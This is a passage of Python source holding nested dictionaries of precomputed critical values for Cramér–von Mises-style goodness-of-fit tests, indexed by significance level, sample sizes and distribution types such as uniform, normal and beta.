0.07840817147245094, 'beta4': 0.028582301342003846}, 500: {'uni': 0.04768205798272118, 'nor': 0.10893592471801378, 'beta1': 0.043098984557192854, 'beta2': 0.08429395075959556, 'beta4': 0.035281334521673924}, 400: {'uni': 0.052145846598435464, 'nor': 0.11218348141224654, 'beta1': 0.048316311309606494, 'beta2': 0.08737730595826376, 'beta4': 0.03951837119677115}, 300: {'uni': 0.058719416850484873, 'nor': 0.11635156663185392, 'beta1': 0.05539882042196062, 'beta2': 0.09410523757141842, 'beta4': 0.04574881189356261}, 200: {'uni': 0.07049814833509804, 'nor': 0.12466200180191964, 'beta1': 0.06800412320163807, 'beta2': 0.10367008819351042, 'beta4': 
0.05653287408590357}, 150: {'uni': 0.07998404492207556, 'nor': 0.13156596855270042, 'beta1': 0.07831590231210439, 'beta2': 0.11171068575197618, 'beta4': 0.0660458608943065}, 100: {'uni': 0.09736733051622676, 'nor': 0.14383411909324195, 'beta1': 0.09527581350107495, 'beta2': 0.1266963468351454, 'beta4': 0.08165556587689915}, 75: {'uni': 0.11099146175383867, 'nor': 0.15454031497016313, 'beta1': 0.11017526259797866, 'beta2': 0.13795208288587246, 'beta4': 0.09575531965915296}, 50: {'uni': 0.13538536757080866, 'nor': 0.17221057810453794, 'beta1': 0.1338257169878449, 'beta2': 0.15804741489707852, 'beta4': 0.11922046414258292}, 30: {'uni': 0.1712608697310144, 'nor': 0.205400562436021, 'beta1': 0.17222575085713476, 'beta2': 0.19119060032529278, 'beta4': 0.1565519610771569}, 20: {'uni': 0.2068845576782115, 'nor': 0.23594894671277633, 'beta1': 0.20857821881607397, 'beta2': 0.2242706036141524, 'beta4': 0.1940900991677027}, 10: {'uni': 0.29081139802402245, 'nor': 0.31265691993665123, 'beta1': 0.29235607151474635, 'beta2': 0.3015701463278587, 'beta4': 0.2789156239002969}}, 20: {1000: {'uni': 0.04642868998031713, 'nor': 0.12332330472504827, 'beta1': 0.04718089852596563, 'beta2': 0.08438078560427192, 'beta4': 0.02457559775898424}, 750: {'uni': 0.04842165313054653, 'nor': 0.12556727406528229, 'beta1': 0.04738271045571918, 'beta2': 0.08834690715792337, 'beta4': 0.028340709811087494}, 500: {'uni': 0.053533279505937725, 'nor': 0.12887684121155335, 'beta1': 0.0479593523582066, 'beta2': 0.093134206549116, 'beta4': 0.034852424538950655}, 400: {'uni': 0.056828739022670716, 'nor': 0.13151540254532723, 'beta1': 0.04877580382157087, 'beta2': 0.09653221115404376, 'beta4': 0.03906534512633897}, 300: {'uni': 0.06308823466796709, 'nor': 0.13632125697142994, 'beta1': 0.0557557473436297, 'beta2': 0.10253109087801837, 'beta4': 0.04531815758557228}, 200: {'uni': 0.07360180211640582, 'nor': 0.1432942311893014, 'beta1': 0.0681727970568623, 'beta2': 0.11121417118399335, 'beta4': 0.05595760960414742}, 
150: {'uni': 0.08288729795659577, 'nor': 0.15043917273012375, 'beta1': 0.0783065570550272, 'beta2': 0.11935424277145812, 'beta4': 0.06470942284344405}, 100: {'uni': 0.09859178235766261, 'nor': 0.16124156030703884, 'beta1': 0.0958462390352337, 'beta2': 0.13264339398473482, 'beta4': 0.08038263656370306}, 75: {'uni': 0.11264602897630796, 'nor': 0.17162756566496928, 'beta1': 0.1093583226332463, 'beta2': 0.1449055731559286, 'beta4': 0.0936741537870105}, 50: {'uni': 0.1351538849647479, 'nor': 0.1891059788104762, 'beta1': 0.13353828395816583, 'beta2': 0.16446554293023208, 'beta4': 0.11692137693757179}, 30: {'uni': 0.17267793406617293, 'nor': 0.2194410481865578, 'beta1': 0.1715183906280785, 'beta2': 0.19549280548078546, 'beta4': 0.15280157061971122}, 20: {'uni': 0.2080554278862089, 'nor': 0.2504069566387129, 'beta1': 0.20849205040193286, 'beta2': 0.22837347924333673, 'beta4': 0.1902516928790116}, 10: {'uni': 0.2889268854801783, 'nor': 0.32163657747008745, 'beta1': 0.29149738853371904, 'beta2': 0.30355224871981534, 'beta4': 0.27571078427238804}}, 10: {1000: {'uni': 0.07592862842758177, 'nor': 0.17675731917954068, 'beta1': 0.0877969299631155, 'beta2': 0.11144784434222144, 'beta4': 0.02460170484284585}, 750: {'uni': 0.07759279278991063, 'nor': 0.1772870041660417, 'beta1': 0.0879620025181791, 'beta2': 0.11460621564738957, 'beta4': 0.02832708685480334}, 500: {'uni': 0.08065845775127545, 'nor': 0.17989701264902008, 'beta1': 0.08783750916584376, 'beta2': 0.11712110163722245, 'beta4': 0.03467098270876123}, 400: {'uni': 0.08256541536026196, 'nor': 0.18417802004566128, 'beta1': 0.08790601108528329, 'beta2': 0.12019289656717527, 'beta4': 0.03891946560744147}, 300: {'uni': 0.08559905562808945, 'nor': 0.18462701647872692, 'beta1': 0.08826474685236314, 'beta2': 0.12439317845494924, 'beta4': 0.044963765983094595}, 200: {'uni': 0.09169859151319848, 'nor': 0.19139039112626904, 'beta1': 0.08930844976492569, 'beta2': 0.13136678111208, 'beta4': 0.054792012779084076}, 150: {'uni': 
0.09812163743144275, 'nor': 0.19750433547881496, 'beta1': 0.09057788640231174, 'beta2': 0.13861898534255174, 'beta4': 0.06359560963591554}, 100: {'uni': 0.11008343360793232, 'nor': 0.20777204018968287, 'beta1': 0.09689906172316676, 'beta2': 0.15021550515080317, 'beta4': 0.07807825052420148}, 75: {'uni': 0.12242653071663401, 'nor': 0.215751343862846, 'beta1': 0.11085258086667488, 'beta2': 0.16074658563892358, 'beta4': 0.0909916380632606}, 50: {'uni': 0.1425128725621415, 'nor': 0.23236256807944267, 'beta1': 0.13421822598853264, 'beta2': 0.17967686927808513, 'beta4': 0.11246630487802428}, 30: {'uni': 0.1756938390152408, 'nor': 0.25727221518650933, 'beta1': 0.17068207541412989, 'beta2': 0.2079075053657387, 'beta4': 0.1469866126893361}, 20: {'uni': 0.21140412281823978, 'nor': 0.28677376608134897, 'beta1': 0.20711509883306756, 'beta2': 0.2384287148752032, 'beta4': 0.18262460986524906}, 10: {'uni': 0.28890701868848456, 'nor': 0.3541341956391229, 'beta1': 0.28845583251972085, 'beta2': 0.3104258261391907, 'beta4': 0.2639310068340357}}}} # skipcq: FLK-E231, FLK-E501 # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update step and the single distributions in the s_cm-tests in the update steps self.crit_val_upd_cm = {0.05: {1000: {1000: {'uni': 0.45559810479972657, 'nor': 0.8517883181720683, 'beta1': 0.46148158376018295, 'beta2': 2.5871697557890188, 'beta4': 0.31747502464750654}, 750: {'uni': 0.46139038881877054, 'nor': 0.7435903262011547, 'beta1': 0.45311472469817826, 'beta2': 1.9077935301454356, 'beta4': 0.32427601703371456}, 500: {'uni': 0.46902770162756147, 'nor': 0.6520675952105567, 'beta1': 0.4585639552609696, 'beta2': 1.3749405307284122, 'beta4': 0.3505515605224531}, 400: {'uni': 0.46369685433009517, 'nor': 0.6086007217455988, 'beta1': 0.46599917293822524, 'beta2': 1.179045003751046, 'beta4': 0.3729228914045017}, 300: {'uni': 0.4644552857669589, 'nor': 
0.5653154717862657, 'beta1': 0.46300936268982834, 'beta2': 0.9776044208448484, 'beta4': 0.38982619311615263}, 200: {'uni': 0.4571278925321188, 'nor': 0.5334620435688897, 'beta1': 0.45769696165515195, 'beta2': 0.783196788788819, 'beta4': 0.4111185009994434}, 150: {'uni': 0.4501014461173613, 'nor': 0.5235082860405369, 'beta1': 0.4554205617411987, 'beta2': 0.7050034087974801, 'beta4': 0.4169551450168423}, 100: {'uni': 0.4640563713024824, 'nor': 0.5088639605300145, 'beta1': 0.4526189404673693, 'beta2': 0.6166857601686297, 'beta4': 0.4284294881310813}, 75: {'uni': 0.46172983920615474, 'nor': 0.48326130937595263, 'beta1': 0.46557677737339276, 'beta2': 0.5663728109579013, 'beta4': 0.43479865707945214}, 50: {'uni': 0.45384779467384323, 'nor': 0.4744302526175002, 'beta1': 0.4578899375202278, 'beta2': 0.5360352336411138, 'beta4': 0.4483607871304931}, 30: {'uni': 0.4582035780536769, 'nor': 0.4625643124126838, 'beta1': 0.46174031673574345, 'beta2': 0.4992136649412738, 'beta4': 0.45735799800719645}, 20: {'uni': 0.4526152214826935, 'nor': 0.4700366710058157, 'beta1': 0.45825521668523833, 'beta2': 0.48288733318211274, 'beta4': 0.4513037697878831}, 10: {'uni': 0.4557565864779044, 'nor': 0.4605305109093896, 'beta1': 0.45008522280936103, 'beta2': 0.456650225645871, 'beta4': 0.4473779014384035}}, 750: {1000: {'uni': 0.4671101385676527, 'nor': 0.9530664085923595, 'beta1': 0.47021996721580633, 'beta2': 2.576076443647349, 'beta4': 0.28735513040023863}, 750: {'uni': 0.46549469608311234, 'nor': 0.8304507565146779, 'beta1': 0.46247720908266216, 'beta2': 1.9297411734235133, 'beta4': 0.3175400030818115}, 500: {'uni': 0.45031971859128733, 'nor': 0.7037121636426986, 'beta1': 0.4561887749034241, 'beta2': 1.3861924601141589, 'beta4': 0.33932522495776996}, 400: {'uni': 0.45910749033925163, 'nor': 0.6584547024212655, 'beta1': 0.46280894836812647, 'beta2': 1.177901179686585, 'beta4': 0.36205890600857127}, 300: {'uni': 0.4598996192822354, 'nor': 0.5932997635796144, 'beta1': 0.4566144871979255, 
'beta2': 1.003307298985205, 'beta4': 0.37620893309626435}, 200: {'uni': 0.4687450522736763, 'nor': 0.5535329672062865, 'beta1': 0.45546423259991065, 'beta2': 0.8003681825795168, 'beta4': 0.39545533013427847}, 150: {'uni': 0.4615068053273442, 'nor': 0.5337201883098839, 'beta1': 0.4658827349939095, 'beta2': 0.7194878279530482, 'beta4': 0.39930675083159844}, 100: {'uni': 0.45294161352762236, 'nor': 0.49934234578623937, 'beta1': 0.45939987939480864, 'beta2': 0.6271644471759874, 'beta4': 0.42228996859829304}, 75: {'uni': 0.46396194890875886, 'nor': 0.4991938436100394, 'beta1': 0.4516637122972515, 'beta2': 0.600183976681279, 'beta4': 0.4315787240897153}, 50: {'uni': 0.4558134596093263, 'nor': 0.48532012355575227, 'beta1': 0.46668813480110743, 'beta2': 0.5516090319210735, 'beta4': 0.4403510493137504}, 30: {'uni': 0.4532337683620265, 'nor': 0.47431141524632014, 'beta1': 0.45894951442019266, 'beta2': 0.5127086350573624, 'beta4': 0.4538090248861624}, 20: {'uni': 0.45706656231424797, 'nor': 0.4683828099157367, 'beta1': 0.4578578291661163, 'beta2': 0.48619566535923797, 'beta4': 0.45265523176626016}, 10: {'uni': 0.4547063269767834, 'nor': 0.4642234490355344, 'beta1': 0.458910199349091, 'beta2': 0.47790940842399, 'beta4': 0.44187531689045434}}, 500: {1000: {'uni': 0.46431028072910796, 'nor': 1.2234668429214117, 'beta1': 0.4663409164283998, 'beta2': 2.909984174283791, 'beta4': 0.2638984835623977}, 750: {'uni': 0.4527296267722845, 'nor': 1.0129802673096442, 'beta1': 0.4661915241033681, 'beta2': 2.234543975122914, 'beta4': 0.28640752516522716}, 500: {'uni': 0.44920975339976527, 'nor': 0.8384973662337322, 'beta1': 0.4659177279610012, 'beta2': 1.6573851889124338, 'beta4': 0.3100483149128471}, 400: {'uni': 0.4604675769306956, 'nor': 0.7579069321331191, 'beta1': 0.4597499831992274, 'beta2': 1.375925316264524, 'beta4': 0.3271543663337684}, 300: {'uni': 0.46331646241562313, 'nor': 0.6860309707578209, 'beta1': 0.45672744909248153, 'beta2': 1.1455923805506387, 'beta4': 
0.35199679848261545}, 200: {'uni': 0.46098791431035313, 'nor': 0.6110936233160561, 'beta1': 0.45623909036855964, 'beta2': 0.9023873311329137, 'beta4': 0.3740712067833442}, 150: {'uni': 0.46468019323747944, 'nor': 0.5726647439154294, 'beta1': 0.4579527283181098, 'beta2': 0.8137349608860205, 'beta4': 0.38660489715338325}, 100: {'uni': 0.44280947247057195, 'nor': 0.541212184044558, 'beta1': 0.4586912165344261, 'beta2': 0.6802911262157844, 'beta4': 0.40623099849768124}, 75: {'uni': 0.46067109767294057, 'nor': 0.5060241328725488, 'beta1': 0.4491456775696246, 'beta2': 0.6232000035126825, 'beta4': 0.41007335800405376}, 50: {'uni': 0.4642733769081602, 'nor': 0.4977233114944672, 'beta1': 0.4626897423482415, 'beta2': 0.5705187474225152, 'beta4': 0.43059164051626647}, 30: {'uni': 0.4634043308646643, 'nor': 0.47331431231053034, 'beta1': 0.4554845714502249, 'beta2': 0.5139451555702169, 'beta4': 0.4409000510846484}, 20: {'uni': 0.45447992295448086, 'nor': 0.46678900243826393, 'beta1': 0.4626946837181949, 'beta2': 0.4930376191474854, 'beta4': 0.44935770151688587}, 10: {'uni': 0.45968160397151125, 'nor': 0.45690145976659674, 'beta1': 0.4566821472035449, 'beta2': 0.47419588710664023, 'beta4': 0.4454396591179534}}, 400: {1000: {'uni': 0.46334746314235276, 'nor': 1.4212390782587057, 'beta1': 0.46432389571147187, 'beta2': 2.9511199986889567, 'beta4': 0.2548616038247043}, 750: {'uni': 0.46250149072434, 'nor': 1.1572837205061097, 'beta1': 0.45295311454161974, 'beta2': 2.2440218041300914, 'beta4': 0.2710536211963412}, 500: {'uni': 0.45875549934793214, 'nor': 0.9122844809960323, 'beta1': 0.46801707119646535, 'beta2': 1.6311861640718006, 'beta4': 0.299393562783303}, 400: {'uni': 0.45999191565658354, 'nor': 0.8321847654729663, 'beta1': 0.4543498505221871, 'beta2': 1.3834076695036321, 'beta4': 0.3147187867784898}, 300: {'uni': 0.4554315877101111, 'nor': 0.7443688240945351, 'beta1': 0.45801052563798017, 'beta2': 1.1684865218336506, 'beta4': 0.33644119882532764}, 200: {'uni': 
0.45178274951742387, 'nor': 0.6453749303312785, 'beta1': 0.4622690847109136, 'beta2': 0.9539305765063816, 'beta4': 0.36638705949582}, 150: {'uni': 0.46095703347012823, 'nor': 0.5920587225254844, 'beta1': 0.46154296100068704, 'beta2': 0.8211590220880783, 'beta4': 0.3773287000190313}, 100: {'uni': 0.4544996973676238, 'nor': 0.5571569000218716, 'beta1': 0.453375970925131, 'beta2': 0.692973824446134, 'beta4': 0.39552439235261067}, 75: {'uni': 0.4557987009033754, 'nor': 0.5310033434466808, 'beta1': 0.46394857322795036, 'beta2': 0.6395425030032836, 'beta4': 0.41383415561423936}, 50: {'uni': 0.4596200061931766, 'nor': 0.5035061103314598, 'beta1': 0.46157446299514704, 'beta2': 0.5707639621760862, 'beta4': 0.4274547334895614}, 30: {'uni': 0.4622195415634097, 'nor': 0.481847432681625, 'beta1': 0.45645686175488404, 'beta2': 0.5282215919286881, 'beta4': 0.44942696536191723}, 20: {'uni': 0.4601535149631279, 'nor': 0.46786286516371267, 'beta1': 0.4584807741864064, 'beta2': 0.5048557967951252, 'beta4': 0.4467008433551776}, 10: {'uni': 0.4566656610912351, 'nor': 0.4608766556204386, 'beta1': 0.45972096388599104, 'beta2': 0.46187183414597643, 'beta4': 0.44529944495174606}}, 300: {1000: {'uni': 0.4678306072779978, 'nor': 1.6846576613370994, 'beta1': 0.455141320355163, 'beta2': 3.2769979281996946, 'beta4': 0.24362518318852816}, 750: {'uni': 0.4639283758788118, 'nor': 1.3692288724675523, 'beta1': 0.4519930460350413, 'beta2': 2.48255224192705, 'beta4': 0.257787980956284}, 500: {'uni': 0.4615433540741257, 'nor': 1.0781678636207295, 'beta1': 0.4568829378747058, 'beta2': 1.7874941485381564, 'beta4': 0.2784868409512676}, 400: {'uni': 0.46314421492499913, 'nor': 0.945656701408267, 'beta1': 0.45638148747157714, 'beta2': 1.5553160126544203, 'beta4': 0.29442225358951485}, 300: {'uni': 0.45802925961617075, 'nor': 0.815185178839487, 'beta1': 0.4728376878704712, 'beta2': 1.3189271036216643, 'beta4': 0.31282000690847095}, 200: {'uni': 0.45552503014694784, 'nor': 0.7126513035155815, 'beta1': 
0.457748166276982, 'beta2': 1.0244415040388415, 'beta4': 0.33638426993603954}, 150: {'uni': 0.45977438272674637, 'nor': 0.6476380215438066, 'beta1': 0.46088490835938306, 'beta2': 0.883431113717793, 'beta4': 0.3612048298573282}, 100: {'uni': 0.4577251815882555, 'nor': 0.5847497979075034, 'beta1': 0.4607222654294412, 'beta2': 0.7408620962926734, 'beta4': 0.388104481277193}, 75: {'uni': 0.4518072467213142, 'nor': 0.5473729546010359, 'beta1': 0.4627254896168214, 'beta2': 0.6718156449469996, 'beta4': 0.39949639520710356}, 50: {'uni': 0.4624340988295268, 'nor': 0.5070678067559616, 'beta1': 0.4600742937716636, 'beta2': 0.5877011320882554, 'beta4': 0.41897175228123534}, 30: {'uni': 0.4471319926020618, 'nor': 0.49800426129809117, 'beta1': 0.46166731503603964, 'beta2': 0.5382082617448081, 'beta4': 0.4269532461240621}, 20: {'uni': 0.4507897993107089, 'nor': 0.4883236654625753, 'beta1': 0.45173581672090074, 'beta2': 0.5137279220044103, 'beta4': 0.429523416507684}, 10: {'uni': 0.45073558507341144, 'nor': 0.46918804329372793, 'beta1': 0.4451935416099544, 'beta2': 0.4852511163613957, 'beta4': 0.44714304152144957}}, 200: {1000: {'uni': 0.45885173358196935, 'nor': 2.313702128659912, 'beta1': 0.46628907909788697, 'beta2': 3.919691106665795, 'beta4': 0.22577462466197668}, 750: {'uni': 0.46486920384123687, 'nor': 1.894257654666399, 'beta1': 0.4583262434977319, 'beta2': 2.996917703241686, 'beta4': 0.2365414295750558}, 500: {'uni': 0.4655614734441917, 'nor': 1.4121255947025406, 'beta1': 0.46139377072341475, 'beta2': 2.1388747442025053, 'beta4': 0.25571742276292764}, 400: {'uni': 0.45979504899083645, 'nor': 1.1959447863019266, 'beta1': 0.4633743884393436, 'beta2': 1.8945633202659455, 'beta4': 0.26174739678990866}, 300: {'uni': 0.46151970036157763, 'nor': 0.9990455243111591, 'beta1': 0.45625628150868885, 'beta2': 1.5323939095799728, 'beta4': 0.2797029660784162}, 200: {'uni': 0.46329361026808363, 'nor': 0.8279186395972875, 'beta1': 0.4601804288648336, 'beta2': 1.1681140647178716, 'beta4': 
0.30982583667555}, 150: {'uni': 0.4572822684346562, 'nor': 0.7479149303285376, 'beta1': 0.4594933621823919, 'beta2': 0.9966989126230038, 'beta4': 0.33461124037426687}, 100: {'uni': 0.45394668972915964, 'nor': 0.6398062870023858, 'beta1': 0.4627344243428069, 'beta2': 0.8176636065711426, 'beta4': 0.3599502235499713}, 75: {'uni': 0.46314929132601923, 'nor': 0.5942511767606652, 'beta1': 0.462554701559842, 'beta2': 0.726258500681477, 'beta4': 0.37828723280018234}, 50: {'uni': 0.4556089575922582, 'nor': 0.5488603313292467, 'beta1': 0.4598695592482842, 'beta2': 0.6441882415918142, 'beta4': 0.3957454832976954}, 30: {'uni': 0.45773418553147505, 'nor': 0.5205925655922161, 'beta1': 0.45894106285346375, 'beta2': 0.569590768144685, 'beta4': 0.4160624036343173}, 20: {'uni': 0.46253502192456564, 'nor': 0.4949851926492912, 'beta1': 0.462302879698588, 'beta2': 0.5144720515689009, 'beta4': 0.4386929562520044}, 10: {'uni': 0.4585444998193927, 'nor': 0.46913451515184496, 'beta1': 0.4450396687432986, 'beta2': 0.4801828396960754, 'beta4': 0.4417697576556915}}, 150: {1000: {'uni': 0.4686739363709819, 'nor': 3.0262824022146155, 'beta1': 0.46075378959802543, 'beta2': 4.496772517732899, 'beta4': 0.21956864156299188}, 750: {'uni': 0.4730757712115682, 'nor': 2.2878474628402823, 'beta1': 0.4641952013648905, 'beta2': 3.454226350268236, 'beta4': 0.22513983749519534}, 500: {'uni': 0.467323739972249, 'nor': 1.6752768321041132, 'beta1': 0.4734160827536498, 'beta2': 2.5583449698042604, 'beta4': 0.24163315664882407}, 400: {'uni': 0.467181361388595, 'nor': 1.4717110841963421, 'beta1': 0.45676945943433245, 'beta2': 2.2003419598014085, 'beta4': 0.25499403072675786}, 300: {'uni': 0.45817365599621135, 'nor': 1.2144884739248925, 'beta1': 0.45423292829145157, 'beta2': 1.6795832143167255, 'beta4': 0.26984851882435923}, 200: {'uni': 0.46031214602007703, 'nor': 0.9544823344865221, 'beta1': 0.45827471295224265, 'beta2': 1.3068555477711477, 'beta4': 0.2956335766326793}, 150: {'uni': 0.46250179659059476, 'nor': 
0.8307292323075929, 'beta1': 0.47030699679154425, 'beta2': 1.0824444708192549, 'beta4': 0.3116662669384352}, 100: {'uni': 0.47437294155670234, 'nor': 0.698032260670409, 'beta1': 0.46050428122512643, 'beta2': 0.8771177581058969, 'beta4': 0.3478432220883441}, 75: {'uni': 0.46101568928238096, 'nor': 0.6391901872213495, 'beta1': 0.45808838518118866, 'beta2': 0.7703520551683095, 'beta4': 0.35717525548395185}, 50: {'uni': 0.46462622526658554, 'nor': 0.5996395671389139, 'beta1': 0.454405885743777, 'beta2': 0.6701476805830073, 'beta4': 0.383110957598389}, 30: {'uni': 0.4549742139788515, 'nor': 0.5227227637941175, 'beta1': 0.4526654552204387, 'beta2': 0.5842761326082846, 'beta4': 0.4060905864194273}, 20: {'uni': 0.45533149660388467, 'nor': 0.5056742867344781, 'beta1': 0.46385670689315067, 'beta2': 0.5371663970405931, 'beta4': 0.4217230902196201}, 10: {'uni': 0.4535641773609069, 'nor': 0.48426462527854375, 'beta1': 0.4605937364242689, 'beta2': 0.4901859387468606, 'beta4': 0.43806641766772514}}, 100: {1000: {'uni': 0.48930491522355274, 'nor': 4.231794279078222, 'beta1': 0.4648268159128582, 'beta2': 5.076033920994245, 'beta4': 0.2123190473857698}, 750: {'uni': 0.47066230425528277, 'nor': 3.3241758532972563, 'beta1': 0.4613337407126484, 'beta2': 4.110911007916439, 'beta4': 0.21746590521356995}, 500: {'uni': 0.4704192169450034, 'nor': 2.3153245303624077, 'beta1': 0.4565432447792894, 'beta2': 2.8234958993051213, 'beta4': 0.22605852382886565}, 400: {'uni': 0.465838791251487, 'nor': 1.9527095270766885, 'beta1': 0.4566450098243281, 'beta2': 2.4468007928214504, 'beta4': 0.23721322735781392}, 300: {'uni': 0.46411098088520025, 'nor': 1.561014800073201, 'beta1': 0.4632108284525748, 'beta2': 1.8642831244346392, 'beta4': 0.24835753772698207}, 200: {'uni': 0.45174147277551824, 'nor': 1.2023498240705341, 'beta1': 0.46011541007923223, 'beta2': 1.4533092999265533, 'beta4': 0.2695895257232507}, 150: {'uni': 0.45512101910714126, 'nor': 1.0227861444988746, 'beta1': 0.45629355382831654, 'beta2': 
1.2101007363962848, 'beta4': 0.2826402129948454}, 100: {'uni': 0.44895422601988727, 'nor': 0.8281829651173791, 'beta1': 0.4599492148727822, 'beta2': 0.9522402297514921, 'beta4': 0.3100819029507226}, 75: {'uni': 0.4624546094616787, 'nor': 0.7391357154698432, 'beta1': 0.4454256867486279, 'beta2': 0.8380807783471576, 'beta4': 0.3350546905751392}, 50: {'uni': 0.4582123043671451, 'nor': 0.6436142214253436, 'beta1': 0.45290471826329226, 'beta2': 0.6884686777502067, 'beta4': 0.3535200461220699}, 30: {'uni': 0.45027154229719185, 'nor': 0.5713935637999112, 'beta1': 0.4573479450749157, 'beta2': 0.6015939522027731, 'beta4': 0.3839413198651744}, 20: {'uni': 0.45171743897365974, 'nor': 0.5347497445539434, 'beta1': 0.46211432961160004, 'beta2': 0.5451510328036631, 'beta4': 0.40451931108916456}, 10: {'uni': 0.44070319928906704, 'nor': 0.4936671748919524, 'beta1': 0.4541059781166824, 'beta2': 0.49464729872647506, 'beta4': 0.4318904485577639}}, 75: {1000: {'uni': 0.5003977481745122, 'nor': 5.462091297206367, 'beta1': 0.4680613054845644, 'beta2': 5.924127662942348, 'beta4': 0.20689611333819638}, 750: {'uni': 0.4863213870019091, 'nor': 4.195407788335534, 'beta1': 0.45921461198551916, 'beta2': 4.565196319176767, 'beta4': 0.2117710761786967}, 500: {'uni': 0.48206260654769756, 'nor': 3.009404705689477, 'beta1': 0.4594797526137332, 'beta2': 3.2296753596700754, 'beta4': 0.219205809113329}, 400: {'uni': 0.48282191154017823, 'nor': 2.463683631414553, 'beta1': 0.45092972241618584, 'beta2': 2.6765713933408413, 'beta4': 0.2251887548381428}, 300: {'uni': 0.47174966823511777, 'nor': 1.9615869965631514, 'beta1': 0.4583462725670028, 'beta2': 2.1532255364843853, 'beta4': 0.23397868721020146}, 200: {'uni': 0.4626689744300011, 'nor': 1.4641327983886003, 'beta1': 0.4658991503050986, 'beta2': 1.5737286518460933, 'beta4': 0.25104192403440617}, 150: {'uni': 0.4657367060782218, 'nor': 1.2246992402511192, 'beta1': 0.4608643825770374, 'beta2': 1.298200837285324, 'beta4': 0.2657567009143168}, 100: {'uni': 
0.4680974024125245, 'nor': 0.9869302426794837, 'beta1': 0.45671102797869095, 'beta2': 1.0239621521249562, 'beta4': 0.28860697938441604}, 75: {'uni': 0.45721900242950014, 'nor': 0.8394457650917727, 'beta1': 0.45257963102668763, 'beta2': 0.8762211832314769, 'beta4': 0.30828992116505344}, 50: {'uni': 0.46221923910596263, 'nor': 0.7025130572021119, 'beta1': 0.4663920405352124, 'beta2': 0.7320291693929537, 'beta4': 0.3374203378918949}, 30: {'uni': 0.46162653508754836, 'nor': 0.5945057627400746, 'beta1': 0.460262757481406, 'beta2': 0.6125308748955279, 'beta4': 0.37175415079144314}, 20: {'uni': 0.4484831394973252, 'nor': 0.5549838564035073, 'beta1': 0.4465222643970824, 'beta2': 0.5731591544178343, 'beta4': 0.3955814404310021}, 10: {'uni': 0.4476154281433029, 'nor': 0.5084002647840371, 'beta1': 0.44746085678431474, 'beta2': 0.5057333922587223, 'beta4': 0.41560141836545733}}, 50: {1000: {'uni': 0.5663296978660596, 'nor': 7.983963066009825, 'beta1': 0.46814721453633024, 'beta2': 7.492537638667248, 'beta4': 0.20220788976247608}, 750: {'uni': 0.534971516073435, 'nor': 6.083186838398358, 'beta1': 0.46772071939621757, 'beta2': 5.857165814312657, 'beta4': 0.2087106159241854}, 500: {'uni': 0.5110652229849488, 'nor': 4.245763354477031, 'beta1': 0.4635245488014993, 'beta2': 4.006367236866797, 'beta4': 0.2125436775661207}, 400: {'uni': 0.49656540793595844, 'nor': 3.4903307593763615, 'beta1': 0.4596191698570935, 'beta2': 3.220472312730357, 'beta4': 0.21522710874813766}, 300: {'uni': 0.48325484856882694, 'nor': 2.7439875309400663, 'beta1': 0.46979584833424004, 'beta2': 2.454009618094874, 'beta4': 0.22202183552173416}, 200: {'uni': 0.4749008479770199, 'nor': 1.9911920792861806, 'beta1': 0.4646514964240773, 'beta2': 1.8398693746548478, 'beta4': 0.23132822063479933}, 150: {'uni': 0.45992992076859157, 'nor': 1.5868134499191664, 'beta1': 0.4643633359446529, 'beta2': 1.5244070878488096, 'beta4': 0.241921281044518}, 100: {'uni': 0.4595325614734308, 'nor': 1.1877615726990094, 'beta1': 
0.4556650201969106, 'beta2': 1.1488237785978777, 'beta4': 0.26302607932992944}, 75: {'uni': 0.4520277530528519, 'nor': 1.0399301654084963, 'beta1': 0.45349015551351834, 'beta2': 0.9621553030458346, 'beta4': 0.2888083942150036}, 50: {'uni': 0.44992890748902026, 'nor': 0.8404661942325818, 'beta1': 0.45869080459514733, 'beta2': 0.8067902763450495, 'beta4': 0.30944414708340734}, 30: {'uni': 0.45607719675530556, 'nor': 0.6802063225745539, 'beta1': 0.44960843024574637, 'beta2': 0.6511496131049556, 'beta4': 0.34852267592227426}, 20: {'uni': 0.4475451587223669, 'nor': 0.5993508489607557, 'beta1': 0.4465931941437228, 'beta2': 0.596548736443132, 'beta4': 0.37438540421392114}, 10: {'uni': 0.44988236069403104, 'nor': 0.5247871497390096, 'beta1': 0.45464843165719043, 'beta2': 0.50412851889225, 'beta4': 0.4041010172891987}}, 30: {1000: {'uni': 0.7387233486988768, 'nor': 13.088402113564948, 'beta1': 0.47865647929539973, 'beta2': 9.912717867631558, 'beta4': 0.19858219196297577}, 750: {'uni': 0.6716005073702885, 'nor': 9.898721221592352, 'beta1': 0.46649443507443217, 'beta2': 7.416096292643614, 'beta4': 0.20003363414287242}, 500: {'uni': 0.5992179294036338, 'nor': 6.920710947011493, 'beta1': 0.46975583075586863, 'beta2': 4.964800683896901, 'beta4': 0.20435420309200666}, 400: {'uni': 0.5561270269868971, 'nor': 5.66798011970821, 'beta1': 0.4717982184500732, 'beta2': 4.106537093753369, 'beta4': 0.20691331385704004}, 300: {'uni': 0.5368877356646864, 'nor': 4.2779346835887555, 'beta1': 0.4652230282555292, 'beta2': 3.1241120043999575, 'beta4': 0.21011463481669218}, 200: {'uni': 0.4987013286374435, 'nor': 2.959741272830969, 'beta1': 0.46381906690045765, 'beta2': 2.2157230067479814, 'beta4': 0.21729932835609236}, 150: {'uni': 0.49840708861118943, 'nor': 2.352823733206511, 'beta1': 0.45640297863082435, 'beta2': 1.779992721937523, 'beta4': 0.22700584318850683}, 100: {'uni': 0.471756061765789, 'nor': 1.7431236435657966, 'beta1': 0.45530265822942073, 'beta2': 1.337831703717496, 'beta4': 
0.23974268049710493}, 75: {'uni': 0.4649466295886003, 'nor': 1.4126507700625057, 'beta1': 0.4580500700771751, 'beta2': 1.128839322838012, 'beta4': 0.251645105883213}, 50: {'uni': 0.4535321638232544, 'nor': 1.0828805050102166, 'beta1': 0.4538612144716673, 'beta2': 0.8944487312764252, 'beta4': 0.2772114320140775}, 30: {'uni': 0.4548389075174882, 'nor': 0.8377037159832129, 'beta1': 0.4519596464989444, 'beta2': 0.7094375595815571, 'beta4': 0.310244459466603}, 20: {'uni': 0.4451068851924446, 'nor': 0.7339007690903065, 'beta1': 0.4451277942845969, 'beta2': 0.6008918124507844, 'beta4': 0.338998587660669}, 10: {'uni': 0.45353927033858477, 'nor': 0.5782028388164439, 'beta1': 0.4584685620829519, 'beta2': 0.531376107648766, 'beta4': 0.38352415993817385}}, 20: {1000: {'uni': 1.0894922478649511, 'nor': 20.003094666486263, 'beta1': 0.5181844718184673, 'beta2': 12.13321215700854, 'beta4': 0.1962693415263007}, 750: {'uni': 0.9184009700423779, 